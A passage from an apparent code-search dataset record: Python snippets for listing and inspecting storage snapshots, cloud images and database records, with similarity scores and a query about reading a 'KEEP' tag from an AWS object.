sorted(\n [name[:-(len(Archive._SNAP_EXT))] for name in os.listdir(self._path)\n if name.endswith(Archive._SNAP_EXT)])\n timestamps = [datetime.datetime.strptime(x, Archive._TIME_FMT)\n for x in file_names]\n return timestamps", "def list_artifacts(arn=None, type=None, nextToken=None):\n pass", "def list_reference_images_in_filter(conn,primary_ref,f,log):\n\n log.info('Identifying all current reference image in filter '+str(f))\n\n query = 'SELECT * FROM reference_images WHERE filter=\"'+str(primary_ref[f])+\\\n '\" AND software=\"'+str(primary_ref['software_id'])+\\\n '\" AND facility!=\"'+str(primary_ref['facility_id'])+'\"'\n\n ref_image_list = phot_db.query_to_astropy_table(conn, query, args=())\n\n log.info(repr(ref_image_list))\n\n return ref_image_list", "def get_snapshots(vol_name):\n\n l = None\n try:\n cmd = 'gluster snapshot info volume %s --xml' % vol_name\n d, err = xml_parse.run_gluster_command(cmd)\n if err:\n raise Exception(err)\n if d:\n if d[\"op_status\"][\"op_ret\"] == 0:\n l, err = xml_parse.get_snapshots(d[\"root\"])\n if err:\n raise Exception(err)\n except Exception, e:\n return None, 'Error getting volume snapshots: %s' % str(e)\n else:\n return l, None", "def get_snapshot_disks_by_snapshot_obj(snapshot):\n return DISKS_API.getElemFromLink(snapshot)", "def servicemanage_snapshot_glance_metadata_get(context, snapshot_id, session=None):\n if not session:\n session = get_session()\n\n return session.query(models.ServiceManageGlanceMetadata).\\\n filter_by(snapshot_id=snapshot_id).\\\n filter_by(deleted=False).all()", "def list(self, detailed=True, search_opts=None):\n query_string = utils.build_query_param(search_opts, sort=True)\n\n detail = \"\"\n if detailed:\n detail = \"/detail\"\n\n return self._list(\"/group_snapshots%s%s\" % (detail, query_string),\n \"group_snapshots\")", "def listObjects(instance):\n # Get a cursor from the DB connection.\n cursor = Conection.connect(DB_USER, DB_PASSWD, instance, DB_HOST)\n \n # Compose the SQL query to find all the orbits/SSM objects. We do this with \n # a simle query to the derivedobjects table since we realy only need the\n # ssm_id values.\n maxMJD = completedPrecoveryMaxDate(instance)\n if(maxMJD == None):\n return([], None)\n \n sql = 'select distinct(ssm_id) from derivedobjects where ssm_id is not null'\n sql += ' and status = \"I\"'\n # sql += ' and updated >= \"%s\"' %(minModifiedDate)\n # <-- end if\n \n nRes = cursor.execute(sql)\n return([x[0] for x in cursor.fetchall()], float(maxMJD))", "def get_snap_status(mnode):\n\n ret, out, _ = g.run(mnode, \"gluster snapshot status --xml\")\n if ret != 0:\n g.log.error(\"Failed to execute 'snapshot status' on node %s. \"\n \"Hence failed to get the snapshot status.\", mnode)\n return None\n\n try:\n root = etree.XML(out)\n except etree.ParseError:\n g.log.error(\"Failed to parse the gluster snapshot \"\n \"status xml output.\")\n return None\n\n snap_status_list = []\n for snap in root.findall(\"snapStatus/snapshots/snapshot\"):\n snap_status = {}\n for element in snap.getchildren():\n if element.tag == \"volume\":\n status = {}\n status[\"brick\"] = []\n for elmt in element.getchildren():\n if elmt.tag == \"brick\":\n brick_info = {}\n for el in elmt.getchildren():\n brick_info[el.tag] = el.text\n status[\"brick\"].append(brick_info)\n else:\n status[elmt.tag] = elmt.text\n\n snap_status[element.tag] = status\n else:\n snap_status[element.tag] = element.text\n snap_status_list.append(snap_status)\n return snap_status_list", "def list_distributed_cameras(ns_host=None, metadata=None):\n with get_running_nameserver() as name_server:\n camera_uris = name_server.yplookup(meta_all=metadata)\n camera_uris = {k: v[0] for k, v in camera_uris.items()}\n logger.debug(f\"Found {len(camera_uris)} cameras on name server.\")\n return camera_uris", "def list_distributed_cameras(ns_host=None, metadata=None):\n with get_running_nameserver() as name_server:\n camera_uris = name_server.yplookup(meta_all=metadata)\n camera_uris = {k: v[0] for k, v in camera_uris.items()}\n logger.debug(f\"Found {len(camera_uris)} cameras on name server.\")\n return camera_uris", "def getVCDRPGSnaps(**kwargs):\n strVCDRProdURL = kwargs['strVCDRProdURL']\n sessiontoken = kwargs['sessiontoken']\n if kwargs['cloud_fs_id'] is None:\n print(\"Please specify the ID of the cloud file system using '-cloud-fs-id'\")\n sys.exit(1)\n if kwargs['protection_group_id'] is None:\n print(\"Please specify the ID of the protection group using '-protection-group-id'\")\n sys.exit(1)\n cloud_fs_id = kwargs['cloud_fs_id']\n pg_id = kwargs['protection_group_id']\n if kwargs['protection_group_snap_id'] is None:\n json_response = get_vcdr_pg_snaps_json(strVCDRProdURL, cloud_fs_id, pg_id, sessiontoken)\n if json_response == None:\n print(\"API Error\")\n sys.exit(1)\n snaps = json_response[\"snapshots\"]\n table = PrettyTable(['Snapshot Name', 'Snaphot ID'])\n for i in snaps:\n table.add_row([i['name'], i['id']])\n print(table)\n else:\n snap_id = kwargs['protection_group_snap_id']\n json_response = get_vcdr_pg_snap_details_json(strVCDRProdURL, cloud_fs_id, pg_id, snap_id, sessiontoken)\n if json_response == None:\n print(\"API Error\")\n sys.exit(1)\n create_stamp_int = int(json_response['creation_timestamp'])\n create_stamp = datetime.utcfromtimestamp(create_stamp_int/1e9)\n expire_stamp_int = int(json_response['expiration_timestamp'])\n expire_stamp = datetime.utcfromtimestamp(expire_stamp_int/1e9)\n print(\" \")\n print(f\"Snapshot Name: {json_response['name']}\")\n # print(f\"Snapshot Creation: {json_response['creation_timestamp']}\")\n print(f\"Snapshot Creation: {create_stamp}\")\n print(f\"Snapshot Expiration: {expire_stamp}\")\n print(f\"Snapshot Trigger: {json_response['trigger_type']}\")\n print(f\"Number of VM: {json_response['vm_count']}\")\n print(\" \")", "def get_snapshots(FIELDS='all'):\n snapinfostr = fork_and_get_output(\"zfs list -t snapshot -H -o {0}\".format(FIELDS).split())\n header = get_zfs_snap_header()\n snapinfo = snapinfostr.splitlines()\n snapobjs = []\n for snapstr in snapinfo:\n snapobjs.append(DataZFS(snapstr, header, 'snapshot'))\n return snapobjs", "def get_snapshots(self):\n _url = f\"{self.connector.base_url}/projects/{self.project_id}/snapshots\"\n\n response = self.connector.http_call(\"get\", _url)\n self.snapshots = response.json()", "def _from_snapshot_request(pre_image, image):\n if pre_image.status == 'queued' and len(image.locations) == 1:\n loc_meta = image.locations[0]['metadata']\n return loc_meta and loc_meta.get('image_from', None) in ['snapshot',\n 'volume']", "def history(self) -> List[SnapshotLogEntry]:\n return self.metadata.snapshot_log", "def showSnapshots(self):\n from .utils import sp\n s = self.getSnapshots()\n ax = sp(len(s))\n for i, S in enumerate(s):\n ax[i].imshow(S)", "def detect_objects(snap):\n client = vision.ImageAnnotatorClient()\n print(snap)\n\n with open(snap, 'rb') as im_file:\n content = im_file.read()\n image = vision.Image(content=content)\n\n objects = client.object_localization(image=image).localized_object_annotations\n\n print(f\"Found {len(objects)} objects\")\n [print(f\"{objet.name} : {round(objet.score*100,2)}\") for objet in objects]\n \n return objects", "def get_apid_objects(queue, media_base, args, absolute=False):\n work_lock = Lock()\n work_queue = Queue()\n\n readers = os.cpu_count()\n read_lock = Lock()\n read_queue = Queue()\n read_processes = []\n for number in range(readers):\n read_process = Process(\n target=read_apids, args=(read_queue, read_lock, work_queue, work_lock)\n )\n read_process.start()\n read_processes.append(read_process)\n\n logging.info(\"Collecting APID object information\")\n file_list = []\n file_total = 0\n for file_object in os.scandir(media_base + \"/metadata/apid\"):\n if not file_object.is_file():\n continue\n file_list.append({\"fileName\": file_object.path})\n file_total = file_total + 1\n\n read_lock.acquire()\n for item in file_list:\n read_queue.put(item)\n for item in read_processes:\n read_queue.put({\"exit\": True})\n read_lock.release()\n\n index = 100000\n apid_image_map = {}\n apid_screenshot_map = {}\n apid_full_map = {}\n object_map = {}\n image_cache = {}\n item_count = 0\n if absolute:\n image_base = \"{0}\".format(media_base) + \"/media/{0}\"\n else:\n image_base = \"./media/{0}\"\n while True:\n work_lock.acquire()\n if not work_queue.empty():\n metadata = work_queue.get()\n work_lock.release()\n else:\n work_lock.release()\n time.sleep(0.01)\n continue\n\n item_count = item_count + 1\n apid_full_map.update({metadata[\"apid\"]: metadata})\n if \"image\" in metadata:\n if metadata[\"image\"] not in image_cache:\n base_name = metadata[\"image\"].split(\"/media/\").pop(1)\n image_name = image_base.format(base_name)\n image_extension = image_name.split(\".\").pop(-1)\n\n object_id = \"@M{0}@\".format(index)\n object_entry = [\n \"0 {0} OBJE\".format(object_id),\n \"1 FILE {0}\".format(image_name),\n \"1 FORM {0}\".format(image_extension),\n \"1 TYPE document\",\n ]\n\n object_map.update({object_id: object_entry})\n image_cache.update({metadata[\"image\"]: object_id})\n index = index + 1\n else:\n object_id = image_cache[metadata[\"image\"]]\n apid_image_map.update({metadata[\"apid\"]: object_id})\n if \"screenshot\" in metadata:\n base_name = os.path.basename(metadata[\"screenshot\"])\n image_name = image_base.format(\"apid\") + \"/\" + base_name\n image_extension = image_name.split(\".\").pop(-1)\n\n if \"title\" in metadata and metadata[\"title\"] != \"\":\n title = metadata[\"title\"]\n else:\n title = \"Ancestry.com Source Record, {0}\".format(metadata[\"apid\"])\n\n object_id = \"@M{0}@\".format(index)\n object_entry = [\n \"0 {0} OBJE\".format(object_id),\n \"1 FILE {0}\".format(image_name),\n \"1 FORM {0}\".format(image_extension),\n \"1 TITL {0}\".format(title),\n \"1 REFN {0}\".format(metadata[\"apid\"]),\n ]\n\n if \"url\" in metadata and metadata[\"url\"] != \"\":\n object_entry.append(\"1 NOTE {0}\".format(metadata[\"url\"]))\n\n object_map.update({object_id: object_entry})\n index = index + 1\n apid_screenshot_map.update({metadata[\"apid\"]: object_id})\n\n if item_count == file_total:\n break\n\n for read_process in read_processes:\n read_process.join()\n queue.put((apid_image_map, apid_screenshot_map, apid_full_map, object_map))\n logging.info(\"APID object collection completed\")", "def show_snapshot_metadata_item(self, snapshot_id, id):\n url = \"snapshots/%s/metadata/%s\" % (snapshot_id, id)\n resp, body = self.get(url)\n body = json.loads(body)\n self.validate_response(schema.show_snapshot_metadata_item, resp, body)\n return rest_client.ResponseBody(resp, body)", "def _scanRpms(self, snapshot):\n\t\tdistribution = snapshot.distribution()\n\t\tkey = \"%s:%s\" % (distribution[\"product\"], distribution[\"version\"])\n\t\tself._failed[key] = []\n\t\tself._scanned[key] = 0\n\n\t\tprint \"%sScanning %s %s ...%s\" % (BLUE, distribution[\"product\"], distribution[\"version\"], ENDC)\n\t\ttotal = len(snapshot.json()[\"builds\"])\n\t\tindex = 1\n\t\tfor package in snapshot.json()[\"builds\"]:\n\t\t\t# scan devel and unit-tests only\n\t\t\trpms = filter(lambda l: GolangRpm(package[\"build\"], l).provideSourceCode(), package[\"rpms\"])\n\n\t\t\tif rpms == []:\n\t\t\t\tcontinue\n\n\t\t\tdata = {\n\t\t\t\t\"product\": distribution[\"product\"],\n\t\t\t\t\"distribution\": distribution[\"version\"],\n\t\t\t\t\"build\": {\n\t\t\t\t\t\"name\": package[\"build\"],\n\t\t\t\t\t\"rpms\": map(lambda l: {\"name\": l}, rpms)\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tprint \"%sScanning %s ... [%s/%s]%s\" % (WHITE, package[\"build\"], index, total, ENDC)\n\t\t\tindex = index + 1\n\t\t\ttry:\n\t\t\t\tself.scanbuildact.call(data)\n\t\t\texcept ActFailedError as e:\n\t\t\t\tlogging.error(e)\n\t\t\t\tself._failed[key].append(package)\n\t\t\t\tcontinue\n\t\t\texcept FunctionFailedError as e:\n\t\t\t\tlogging.error(e)\n\t\t\t\tself._failed[key].append(package)\n\t\t\t\tcontinue\n\n\t\t\tself._scanned[key] = self._scanned[key] + 1\n\n\t\tprint \"%sscanned %s, failed %s%s\" % (YELLOW, self._scanned[key], len(self._failed[key]), ENDC)\n\t\tprint \"\"", "async def test_get_attached_instruments(subject: Controller):\n instruments = await subject.get_attached_instruments({})\n assert instruments[Mount.RIGHT][\"id\"] == \"P20SV202020070101\"\n assert instruments[Mount.RIGHT][\"config\"].display_name == \"P20 Single-Channel GEN2\"\n assert instruments[Mount.LEFT][\"id\"] == \"P3HMV202020041605\"\n assert instruments[Mount.LEFT][\"config\"].display_name == \"P20 8-Channel GEN2\"", "def get_exploration_snapshots_metadata(exploration_id, limit):\n exploration = get_exploration_by_id(exploration_id)\n oldest_version = max(exploration.version - limit, 0) + 1\n current_version = exploration.version\n version_nums = range(current_version, oldest_version - 1, -1)\n\n return [exp_models.ExplorationSnapshotModel.get_metadata(\n exploration_id, version_num\n ) for version_num in version_nums]", "def get_many_descriptors(self, uuids):", "def get_mapping_actions(image=None, imageId=None, in_digests=[], bundle={}):\n\n if not image or not bundle:\n raise Exception(\"input error\")\n\n if not verify_policy_bundle(bundle=bundle):\n raise Exception(\"input bundle does not conform to bundle schema\")\n\n ret = []\n \n image_infos = []\n\n image_info = anchore_utils.get_all_image_info(image)\n if image_info and image_info not in image_infos:\n image_infos.append(image_info)\n\n for m in bundle['mappings']:\n polname = m['policy_id']\n wlnames = m['whitelist_ids']\n\n for image_info in image_infos:\n #_logger.info(\"IMAGE INFO: \" + str(image_info))\n ii = {}\n ii.update(image_info)\n registry = ii.pop('registry', \"N/A\")\n repo = ii.pop('repo', \"N/A\")\n\n tags = []\n fulltag = ii.pop('fulltag', \"N/A\")\n if fulltag != 'N/A':\n tinfo = anchore_utils.parse_dockerimage_string(fulltag)\n if 'tag' in tinfo and tinfo['tag']:\n tag = tinfo['tag']\n\n for t in [image, fulltag]:\n tinfo = anchore_utils.parse_dockerimage_string(t)\n if 'tag' in tinfo and tinfo['tag'] and tinfo['tag'] not in tags:\n tags.append(tinfo['tag'])\n\n digest = ii.pop('digest', \"N/A\")\n digests = [digest]\n for d in image_info['digests']:\n dinfo = anchore_utils.parse_dockerimage_string(d)\n if 'digest' in dinfo and dinfo['digest']:\n digests.append(dinfo['digest'])\n \n p_ids = []\n p_names = []\n for p in bundle['policies']:\n p_ids.append(p['id'])\n p_names.append(p['name'])\n\n wl_ids = []\n wl_names = []\n for wl in bundle['whitelists']:\n wl_ids.append(wl['id'])\n wl_names.append(wl['name'])\n \n if polname not in p_ids:\n _logger.info(\"policy not in bundle: \" + str(polname))\n continue\n\n skip=False\n for wlname in wlnames:\n if wlname not in wl_ids:\n _logger.info(\"whitelist not in bundle\" + str(wlname))\n skip=True\n if skip:\n continue\n\n mname = m['name']\n mregistry = m['registry']\n mrepo = m['repository']\n if m['image']['type'] == 'tag':\n mtag = m['image']['value']\n mdigest = None\n mimageId = None\n elif m['image']['type'] == 'digest':\n mdigest = m['image']['value']\n mtag = None\n mimageId = None\n elif m['image']['type'] == 'id':\n mimageId = m['image']['value']\n mtag = None\n mdigest = None\n else:\n mtag = mdigest = mimageId = None\n\n if registry == mregistry or mregistry == '*':\n _logger.debug(\"checking mapping for image (\"+str(image_info)+\") match.\")\n\n if repo == mrepo or mrepo == '*':\n doit = False\n matchstring = mname + \": N/A\"\n if tag and (mtag == '*' or mtag == tag or mtag in tags):\n matchstring = mname + \":\" + ','.join([mregistry, mrepo, mtag])\n doit = True\n elif digest and (mdigest == digest or mdigest in in_digests or mdigest in digests):\n matchstring = mname + \":\" + ','.join([mregistry, mrepo, mdigest])\n doit = True\n elif imageId and (mimageId == imageId):\n matchstring = mname + \":\" + ','.join([mregistry, mrepo, mimageId])\n doit = True\n\n matchstring = matchstring.encode('utf8')\n if doit:\n _logger.debug(\"match found for image (\"+str(matchstring)+\")\")\n\n wldata = []\n wldataset = set()\n for wlname in wlnames:\n wldataset = set(list(wldataset) + extract_whitelist_data(bundle, wlname))\n wldata = list(wldataset)\n\n poldata = extract_policy_data(bundle, polname)\n \n wlnames.sort()\n evalstr = ','.join([polname] + wlnames)\n evalhash = hashlib.md5(evalstr).hexdigest()\n ret.append( ( poldata, wldata, polname,wlnames, matchstring, m, evalhash) )\n return(ret)\n else:\n _logger.debug(\"no match found for image (\"+str(image_info)+\") match.\")\n else:\n _logger.debug(\"no match found for image (\"+str(image_info)+\") match.\")\n\n return(ret)", "def get_snapshots(self, region):\n try:\n conn = ec2.connect_to_region(region, **self.credentials)\n region_snapshots = conn.get_all_snapshots(owner='self')\n except boto.exception.EC2ResponseError:\n return []\n return region_snapshots", "def link_snapshot(argstr):\n pass", "def test_aws_service_api_snapshots_get(self):\n pass", "def show(self):\n self.parser.add_argument('assembly_uuid',\n help=\"Assembly uuid or name\")\n args = self.parser.parse_args()\n response = self.client.assemblies.find(name_or_id=args.assembly_uuid)\n fields = ['uuid', 'name', 'description', 'status', 'application_uri',\n 'trigger_uri']\n data = dict([(f, getattr(response, f, ''))\n for f in fields])\n cliutils.print_dict(data, wrap=72)", "def show_snapshot(self, snapshot_id):\n url = \"snapshots/%s\" % snapshot_id\n resp, body = self.get(url)\n body = json.loads(body)\n self.validate_response(schema.show_snapshot, resp, body)\n return rest_client.ResponseBody(resp, body)", "async def list(app: AppIdentity, repo: str, ref: str):\n repo = RepoName.parse(repo)\n\n async with aiohttp.ClientSession(\n headers=await app.installation_headers(repo.owner)) as sesh:\n fetch = checks.GetRuns(owner=repo.owner, repo=repo.repo, ref=ref)\n print(await fetch.execute(sesh))", "def select_mips_from_reference_seq(reference_name):\n\n for mip in Mip.objects.filter(reference_id=reference_name):\n print mip", "def get_snapshot_output(project: Optional[pulumi.Input[Optional[str]]] = None,\n snapshot: Optional[pulumi.Input[str]] = None,\n opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetSnapshotResult]:\n ...", "def get_snapshot_ids_output(filters: Optional[pulumi.Input[Optional[Sequence[pulumi.InputType['GetSnapshotIdsFilterArgs']]]]] = None,\n owners: Optional[pulumi.Input[Optional[Sequence[str]]]] = None,\n restorable_by_user_ids: Optional[pulumi.Input[Optional[Sequence[str]]]] = None,\n opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetSnapshotIdsResult]:\n ...", "def list_snapshots(self, account_id=None, max_items=100):\n if not account_id:\n account_id = get_instance_identity_document()['accountId']\n paginator = self.__client.get_paginator('describe_snapshots')\n response = paginator.paginate(OwnerIds=[account_id], PaginationConfig={'MaxItems': max_items}) \\\n .build_full_result()\n\n return EBSSnapshotsList(response)", "def get_snap_info_by_volname(mnode, volname):\n\n cmd = \"gluster snapshot info volume %s --xml\" % volname\n ret, out, _ = g.run(mnode, cmd)\n if ret != 0:\n g.log.error(\"Failed to execute 'snapshot info' on node %s. \"\n \"Hence failed to get the snapshot info.\", mnode)\n return None\n\n try:\n root = etree.XML(out)\n except etree.ParseError:\n g.log.error(\"Failed to parse the gluster snapshot \"\n \"info xml output.\")\n return None\n\n snap_vol_info = {}\n\n for snap in root.findall(\"snapInfo\"):\n for element in snap.getchildren():\n if element.tag == \"originVolume\":\n info = {}\n for elmt in element.getchildren():\n info[elmt.tag] = elmt.text\n snap_vol_info[element.tag] = info\n else:\n snap_vol_info[element.tag] = element.text\n\n snap_info_list = []\n for snap in root.findall(\"snapInfo/snapshots/snapshot\"):\n snap_info = {}\n for element in snap.getchildren():\n if element.tag == \"snapVolume\":\n info = {}\n for elmt in element.getchildren():\n if elmt.tag == \"originVolume\":\n info[\"originVolume\"] = {}\n for el in elmt.getchildren():\n info[elmt.tag][el.tag] = el.text\n else:\n info[elmt.tag] = elmt.text\n snap_info[element.tag] = info\n else:\n snap_info[element.tag] = element.text\n snap_info_list.append(snap_info)\n snap_vol_info[\"snapshots\"] = snap_info_list\n return snap_vol_info", "def list_images():\n return json_response(list_manifests())", "def test_link_snapshot_by_snap_id(self):\n snapshot_info, sg_name = self.create_sg_snapshot()\n target_sg = \"{sg}_lnk\".format(sg=sg_name)\n snap_name = snapshot_info.get('name')\n snap_id = snapshot_info.get('snapid')\n self.assertIsNotNone(snap_id)\n self.replication.link_snapshot_by_snap_id(\n sg_name, target_sg, snap_name, snap_id)\n snap_details = self._test_get_ss_snapid_detail(\n sg_name, snap_name, snap_id, check_linked=True)\n self.assertTrue(snap_details.get('linked'))\n self.replication.modify_storage_group_snapshot_by_snap_id(\n sg_name, target_sg, snap_name, snap_id, unlink=True)\n snap_details = self._test_get_ss_snapid_detail(\n sg_name, snap_name, snap_id, check_unlinked=True)\n self.assertFalse(snap_details.get('linked'))\n self.provisioning.delete_storage_group(target_sg)", "def get_searched_snaps(search_results):\n return (\n search_results['_embedded']['clickindex:package']\n if '_embedded' in search_results\n else []\n )", "def show_snapshot_metadata(self, snapshot_id):\n url = \"snapshots/%s/metadata\" % snapshot_id\n resp, body = self.get(url)\n body = json.loads(body)\n self.validate_response(schema.show_snapshot_metadata, resp, body)\n return rest_client.ResponseBody(resp, body)", "def ami_by_location(self, location):\n if self.region == 'pytest' or not self.region or not location:\n # Short-circuit if we're running a test or do not have data\n return 'ami-notfound'\n client = boto3.client('ec2', region_name=self.region)\n response = client.describe_images(Filters=[\n {'Name': 'manifest-location', 'Values': [location]},\n ])\n if len(response['Images']) == 0:\n raise RuntimeError('No AMIs found with location: %s' % location)\n if len(response['Images']) > 1:\n raise RuntimeError('Multiple AMIs found: %s' % response['Images'])\n return response['Images'][0]['ImageId']", "def snapshot_by_id(self, snapshot_id: int) -> Optional[Snapshot]:\n try:\n return next(snapshot for snapshot in self.metadata.snapshots if snapshot.snapshot_id == snapshot_id)\n except StopIteration:\n return None", "def archive_list(self) -> List[str]:\n bucket = self.client()\n results = []\n for item in bucket.objects.all():\n if (\n item.key.endswith(\".arcd\") or item.key.endswith(\".arcd.gpg\")\n ) and \"meta\" not in item.key:\n results.append(item.key.split(\".\", 1)[0])\n return results", "def get_assemblies_link_from_accession_number(term):\n ###########print('+++++++',term)\n # provide your own mail here # I wrote the email at the begining of the codes\n handle = Entrez.esearch(db=\"assembly\", term=term, retmax=\"200\")\n record = Entrez.read(handle)\n ids = record[\"IdList\"]\n links = []\n for aid in ids:\n summary = get_id_give_assembly_summary(aid) # get summary\n url = summary[\"DocumentSummarySet\"][\"DocumentSummary\"][0][\"FtpPath_RefSeq\"]\n if url == \"\":\n continue\n label = os.path.basename(url)\n # get the fasta link - change this to get other formats\n link = url + \"/\" + label + \"_genomic.fna.gz\"\n link = link.replace(\"ftp://\", \"https://\")\n links.append(link)\n \n #############print('=======', links)\n return links", "def get_assemblies(term, download=True, path='assemblies'):\n\n from Bio import Entrez\n #provide your own mail here\n Entrez.email = \"A.N.Other@example.com\"\n handle = Entrez.esearch(db=\"assembly\", term=term, retmax='200')\n record = Entrez.read(handle)\n ids = record['IdList']\n print (f'found {len(ids)} ids')\n links = []\n for id in ids:\n #get summary\n summary = get_assembly_summary(id)\n #get ftp link\n url = summary['DocumentSummarySet']['DocumentSummary'][0]['FtpPath_RefSeq']\n if url == '':\n continue\n label = os.path.basename(url)\n #get the fasta link - change this to get other formats\n link = os.path.join(url,label+'_genomic.fna.gz')\n print (link)\n links.append(link)\n if download == True:\n #download link\n urllib.request.urlretrieve(link, f'{label}.fna.gz')\n return links", "def get_scnlist_all(self):\n logger.debug(\"Creating Database Engine and Session.\")\n db_engine = sqlalchemy.create_engine(self.db_info_obj.dbConn)\n session_sqlalc = sqlalchemy.orm.sessionmaker(bind=db_engine)\n ses = session_sqlalc()\n logger.debug(\"Perform query to find scenes which need downloading.\")\n query_result = ses.query(EDDSentinel1ASF).order_by(EDDSentinel1ASF.Acquisition_Date.asc()).all()\n scns = list()\n if query_result is not None:\n for record in query_result:\n scns.append(record.PID)\n ses.close()\n logger.debug(\"Closed the database session.\")\n return scns", "def _instancelist(self):\n\n rv = []\n self.iname = {}\n for resv in self.conn.get_all_reservations():\n for inst in resv.instances:\n if inst.state != 'terminated':\n name = inst.tags.get('Name',None)\n rv.append([inst.id,inst.state])\n if name is not None:\n rv.append([name,inst.state])\n else:\n rv.append([inst.id+'-needsName',inst.state])\n self.iname[name] = inst.id\n self.iname[inst.id] = inst.id\n return rv", "def test_ami_exists(self) -> None:\n owner = self.sts.get_caller_identity().get('Account')\n amis = self.ec2_client.describe_images(\n Owners=[owner],\n Filters=[{\n 'Name': 'name',\n 'Values': ['saints-xctf-web-server*']\n }]\n )\n self.assertTrue(len(amis.get('Images')) > 0)", "def get_snapshot(project, zone, instance):\n snapshot_disks(project, zone, *get_disks(instance))", "def test_volume_snapshot_create_get_list_delete(self):\n volume = self.create_volume()\n self.addCleanup(self.delete_volume, volume['id'])\n\n s_name = data_utils.rand_name(self.__class__.__name__ + '-Snapshot')\n # Create snapshot\n snapshot = self.snapshots_client.create_snapshot(\n volume_id=volume['id'],\n display_name=s_name)['snapshot']\n\n def delete_snapshot(snapshot_id):\n waiters.wait_for_volume_resource_status(self.snapshots_client,\n snapshot_id,\n 'available')\n # Delete snapshot\n self.snapshots_client.delete_snapshot(snapshot_id)\n self.snapshots_client.wait_for_resource_deletion(snapshot_id)\n\n self.addCleanup(delete_snapshot, snapshot['id'])\n self.assertEqual(volume['id'], snapshot['volumeId'])\n # Get snapshot\n fetched_snapshot = self.snapshots_client.show_snapshot(\n snapshot['id'])['snapshot']\n self.assertEqual(s_name, fetched_snapshot['displayName'])\n self.assertEqual(volume['id'], fetched_snapshot['volumeId'])\n # Fetch all snapshots\n snapshots = self.snapshots_client.list_snapshots()['snapshots']\n self.assertIn(snapshot['id'], map(lambda x: x['id'], snapshots))", "def find_amr(self):\n import csv\n amr_data = csv.DictReader(open(self.nasmnt + \"WGSspades/reports/resfinder.csv\"))\n for row in amr_data:\n name = row[\"Contig\"].split(\"_\")[0]\n if name in self.names:\n if float(row[\"PercentIdentity\"]) > 98.0:\n amr = list()\n amr.append(row[\"Gene\"])\n amr.append(row[\"Resistance\"])\n amr.append(row[\"PercentIdentity\"])\n if \"AMR\" in self.metadata[name]:\n self.metadata[name][\"AMR\"].append(amr)\n else:\n self.metadata[name][\"AMR\"] = list()\n self.metadata[name][\"AMR\"].append(amr)\n\n # print(self.metadata)" ]
[ "0.72130966", "0.6595902", "0.6541823", "0.6166669", "0.61240566", "0.60049653", "0.59619623", "0.5923196", "0.5922994", "0.5888076", "0.5858373", "0.5827235", "0.58137566", "0.580514", "0.57657516", "0.57389045", "0.5632397", "0.56060064", "0.5601814", "0.56017476", "0.5551599", "0.5520943", "0.55089486", "0.54938936", "0.5476389", "0.54459274", "0.54459274", "0.541808", "0.54120713", "0.54077", "0.5407466", "0.54010427", "0.5364513", "0.53357106", "0.5323034", "0.5304825", "0.52497435", "0.52294546", "0.5206177", "0.5175656", "0.5159866", "0.51379645", "0.5131944", "0.5126953", "0.5102134", "0.5081561", "0.5081322", "0.50618327", "0.505268", "0.5050425", "0.5040057", "0.50397044", "0.5034769", "0.50284886", "0.5015735", "0.50115025", "0.5011213", "0.49611318", "0.49569505", "0.49569505", "0.4938782", "0.49229375", "0.4900251", "0.48707324", "0.48455545", "0.48451984", "0.4839872", "0.4839526", "0.48364162", "0.48322642", "0.4819993", "0.4817902", "0.47946495", "0.4788866", "0.47887415", "0.47846192", "0.4779534", "0.47733963", "0.4771701", "0.47427654", "0.47381124", "0.4722611", "0.47205424", "0.47198424", "0.47190905", "0.47079012", "0.4695236", "0.4691493", "0.46904847", "0.4683625", "0.46803856", "0.46786305", "0.46739957", "0.4673754", "0.46680027", "0.46675068", "0.46629855", "0.46514148", "0.46486932", "0.46482283" ]
0.77030766
0
If tag with key='KEEP' exists, return its value (can be an empty string), else it's 'notag'
def getKeepTag(obj): if 'KEEP' in obj.tags: return obj.tags['KEEP'] else: return "-------no-tag" # try: # tag = obj.tags['KEEP'] # except: # # Note: some with empty KEEP-tags, through web console they look the same as those untagged # return "-----" # return tag
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_keep_tag(obj):\n if 'KEEP' in obj.tags and len(obj.tags['KEEP'].strip()) != 0:\n return obj.tags['KEEP']\n else:\n return \"-------no-tag\"", "def tag_word(self, w): \n if self.unknown(w):\n return self.default_tag\n else:\n return max(self.word_tags[w], key=self.word_tags[w].get)", "def gettag(query, lemmatag=False):\n if lemmatag:\n return lemmatag\n\n tagdict = {'N': 'n',\n 'J': 'a',\n 'V': 'v',\n 'A': 'r',\n 'None': False,\n '': False,\n 'Off': False}\n\n # in case someone compiles the tregex query\n try:\n query = query.pattern\n except AttributeError:\n query = query\n \n\n qr = query.replace(r'\\w', '').replace(r'\\s', '').replace(r'\\b', '')\n firstletter = next((c for c in qr if c.isalpha()), 'n')\n return tagdict.get(firstletter.upper(), 'n')", "def getStrNo(self, key):\n value = self.getConf(key);\n if value == \"no\":\n return None\n else:\n return value", "def check_tag(obj, tag_name):\n rfctag = None\n if obj.get('Tags'):\n for tag in obj.get('Tags'):\n if tag.get('Key') == tag_name:\n tag_value = tag.get('Value')\n tag_value = re.sub('[,]', '/', tag_value)\n return tag_value\n continue\n if not rfctag:\n return str(\"no-record\")", "def salvage_tag_data(tag_text):\n data = process_start_tag(tag_text)\n tag = data[0]\n attributes = data[1]\n # Jloggraph applet data\n if tag == \"param\" and \"name\" in attributes:\n if attributes[\"name\"] == \"table\" and \"value\" in attributes:\n return attributes[\"value\"]\n # Spacegroup\n if tag_is_spacegroup(tag_text):\n return tag_text\n\n # Return an empty string by default\n return \"\"", "def _issingleton(self, tagname):\n return self.shortempty", "def tp_key_value(str_tag):\n rgx_split = re.compile(r'[\\@\\(\\)\\{\\}]')\n str_key, str_value = '', ''\n\n # count the pieces\n lst_parts = rgx_split.split(str_tag)\n lng_parts = len(lst_parts)\n\n # and winnow the noise\n if lng_parts > 1:\n str_key = lst_parts[1]\n if lng_parts > 2:\n for str_value in lst_parts[2:]:\n if str_value != '':\n break\n\n return (str_key, str_value)", "def get_config_value(keyword):\n if g_configs and keyword in g_configs:\n return g_configs[keyword]\n return \"\"", "def tag_to_wordnet(tag):\n if (tag == 'ADJ'): return('a')\n elif (tag == 'ADV'): return('r')\n elif (tag == 'NOUN'): return('n')\n elif (tag == 'VERB'): return('v')\n else: return None", "def cypher_unknownTag_keyword(self, variable_tagUnknown=\"tag_unknown\"):\n\n if not self.keyword:\n return \"\"\n 